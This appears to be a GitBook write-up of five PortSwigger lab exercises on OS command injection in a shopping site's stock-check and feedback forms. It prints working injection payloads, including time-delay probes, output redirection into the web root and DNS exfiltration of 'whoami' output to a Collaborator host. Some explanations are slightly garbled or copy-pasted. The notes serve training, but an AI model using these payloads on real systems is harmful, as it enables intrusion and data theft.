# Command Injection Labs ### LAB #1: OS command injection - a simple case Lab URL: Objective: Execute the `whoami` command to determine the name of the current user. This lab contains a shopping application that has different no of products for purchase. Each product has `Check Stock` a functionality in which we can see which products are in stock. For checking the stock they are sending the POST request to the `/product/stock` endpoint with the following parameters. ``` productId=1&storeId=1 ``` If we change the `productID` with `%26woami||` we can successfully execute the shell commands. ### LAB #2: Blind OS command injection with time delays Lab URL: Objective: Exploit the blind OS command that causes a 10-second delay. This lab contains a shopping application that has a different number of products for purchase. The site also has `submit feedback` functionality on `/feedback/submit`. We can submit feedback using a POST request with the parameters `csrf`, `name`, `email`, `subject`, and `message`. This request looks like the following. ``` POST /feedback/submit HTTP/2 Host: 0a570077046bf0ec819c20e200ff00fc.web-security-academy.net Cookie: session=vvR2TvdcvgzSfd9Gk9hSwbgJ06skpFgQ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 124 Origin: https://0a570077046bf0ec819c20e200ff00fc.web-security-academy.net Dnt: 1 Referer: https://0a570077046bf0ec819c20e200ff00fc.web-security-academy.net/feedback csrf=TDzkG4ZyyhjE890Ojvukl4FNTgNQhHhE&name=temp&email=temp%40temp.com&subject=anything&message=hello ``` If we change the email parameter like the following we will see certain seconds of time delay in our response. ``` csrf=TDzkG4ZyyhjE890Ojvukl4FNTgNQhHhE&name=temp&email=temp%40temp.com||ping+-c+10+localhost||&subject=anything&message=hello ``` There we use `||` to break the shell command and then add a ping command `localhost` that will send total request pings after that we separate the remaining command with the `||` character. They are using OS native email functionality to send an email that gets the `email`, and `subject` like this. ``` mail –s "anything" temp@temp.com ``` They add our user-supplied email without any validation into the shell command and with that, the above shell command becomes like this ``` mail -s "anything" temp@temp.com||ping -c 10 localhost|| ``` ### LAB #3: Blind OS command injection with output redirection Lab URL: Objective: Execute the `whoami` command and retrieve its output. This lab contains a shopping application that has a different number of products for purchase. The site also has a `submit feedback` functionality on `/feedback/submit`. We can submit feedback using a POST request with the parameters `csrf`, `name`, `email`, `subject`, and `message`. This request looks like the following. ``` POST /feedback/submit HTTP/2 Host: 0ab000790446117e80a412330022000c.web-security-academy.net Cookie: session=0YWiP22CUfWGE4dcvQS2B7XyRJmCzj7x User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 98 Origin: https://0ab000790446117e80a412330022000c.web-security-academy.net Dnt: 1 Referer: https://0ab000790446117e80a412330022000c.web-security-academy.net/feedback csrf=cmzN16GjRkBRjSFUpK8pLBr9URq7ytvn&name=temp&email=temp%40temp.com&subject=temp&message=temp%0A ``` If we change the email parameter like the following we will see certain seconds of time delay in our response. ``` csrf=cmzN16GjRkBRjSFUpK8pLBr9URq7ytvn&name=temp&email=temp%40temp.com||sleep+10||&subject=temp&message=temp%0A ``` There we use `||` to break the shell command and then add a ping command to send a `ping` to `localhost` that will send total request pings after that we separate the remaining command with the `||` character. They use OS-native email functionality to send an email that gets the `email`, and `subject` like this. ``` mail –s "anything" temp@temp.com ``` They add our user-supplied email without any validation into the shell command and with that, the above shell command becomes like this ``` mail -s "anything" temp@temp.com||ping -c 10 localhost|| ``` Confirming we have a blind command injection we can run any command and redirect its output to a file in a readable directory. After that, we can read that file by visiting that file URL in the browser. So the steps should look like the following. ``` POST /feedback/submit HTTP/2 Host: 0ab000790446117e80a412330022000c.web-security-academy.net Cookie: session=0YWiP22CUfWGE4dcvQS2B7XyRJmCzj7x User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 137 Origin: https://0ab000790446117e80a412330022000c.web-security-academy.net Dnt: 1 Referer: https://0ab000790446117e80a412330022000c.web-security-academy.net/feedback Te: trailers csrf=cmzN16GjRkBRjSFUpK8pLBr9URq7ytvn&name=temp&email=temp%40temp.com||whoami+>+/var/www/images/whoami.txt||&subject=temp&message=temp%0A ``` There we use the following command in the email parameter. ``` whoami > /var/www/images/whoami.txt ``` this executes the `whoami` the command that is used to get the username of the currently logged-in user in the OS and then we use the output redirector `>` that will redirect the output of the command to a file and writes it so we supplied `/var/www/images/whoami.txt` path. In which `whoami.txt` is the file created and contains the output of the `whoami` command. As we know the site uses the following url to fetch images. ``` https://0ab000790446117e80a412330022000c.web-security-academy.net/image?filename=01.png ``` We can use that to get out the `whoami.txt` file like the following. ``` https://0ab000790446117e80a412330022000c.web-security-academy.net/image?filename=whoami.txt ``` ### LAB #4: Blind OS command injection with out-of-band interaction Lab URL: Objective: Exploit OS command injection to issue a DNS lookup to Burp Collaborator This lab contains a shopping application that has a different number of products for purchase. The site also has `submit feedback` functionality on `/feedback/submit`. We can submit feedback using a POST request with the parameters `csrf`, `name`, `email`, `subject`, and `message`. This request looks like the following. ``` POST /feedback/submit HTTP/2 Host: 0a6c00b3049c885780ab4e7900ee00db.web-security-academy.net Cookie: session=X52KKnSbEHZFBZuXv0FDFb4yzmWsHAf1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Te: trailers Connection: close csrf=wV6E44vNhrydBtLgr6UVBB5bbQi0LPb5&name=temp&email=temp%40temp.com&subject=temp&message=temp ``` If we change the email parameter like the following ``` csrf=wV6E44vNhrydBtLgr6UVBB5bbQi0LPb5&name=temp&email=temp%40temp.com||sleep+10||&subject=temp&message=temp ``` we will not see any certain seconds of time delay in our response but if we supplied a burp collaborator domain like this we will see an out-of-band interaction. ``` csrf=wV6E44vNhrydBtLgr6UVBB5bbQi0LPb5&name=temp&email=temp%40temp.com||nslookup+gn7rxenzjteskktdr2zxjnkxjoped3.oastify.com||&subject=temp&message=temp ``` ### LAB #5: Blind OS command injection with out-of-band data exfiltration Lab URL: Objective: Exploit OS command injection to do an out-of-band interaction to exfiltrate the output of `whoami` command. This lab contains a shopping application that has a different number of products for purchase. The site also has `submit feedback` functionality on `/feedback/submit`. We can submit feedback using a POST request with the parameters `csrf`, `name`, `email`, `subject`, and `message`. This request looks like the following. ``` POST /feedback/submit HTTP/2 Host: 0a6c00b3049c885780ab4e7900ee00db.web-security-academy.net Cookie: session=X52KKnSbEHZFBZuXv0FDFb4yzmWsHAf1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Te: trailers Connection: close csrf=wV6E44vNhrydBtLgr6UVBB5bbQi0LPb5&name=temp&email=temp%40temp.com&subject=temp&message=temp ``` If we change the email parameter like the following ``` csrf=wV6E44vNhrydBtLgr6UVBB5bbQi0LPb5&name=temp&email=temp%40temp.com||sleep+10||&subject=temp&message=temp ``` we will not see any certain seconds of time delay in our response but if we supplied a burp collaborator domain like this we will see an out-of-band interaction. ``` csrf=wV6E44vNhrydBtLgr6UVBB5bbQi0LPb5&name=temp&email=temp%40temp.com||nslookup+gn7rxenzjteskktdr2zxjnkxjoped3.oastify.com||&subject=temp&message=temp ``` Knowing there is a command injection vulnerability we can exfiltrate data like the following. ``` csrf=wV6E44vNhrydBtLgr6UVBB5bbQi0LPb5&name=temp&email=temp%40temp.com||nslookup+`whoami`.gn7rxenzjteskktdr2zxjnkxjoped3.oastify.com||&subject=temp&message=temp ``` There we use backticks to run the inline shell command and append its output to our burp collaborator subdomain. So when this command run we will see the username of the currently logged-in user with the domain name like the following in our burp collaborator logs. ``` peter.gn7rxenzjteskktdr2zxjnkxjoped3.oastify.com ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://w4h33d.gitbook.io/hack-notes/web-application-security/web-application-security-notes/command-injection/command-injection-labs.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.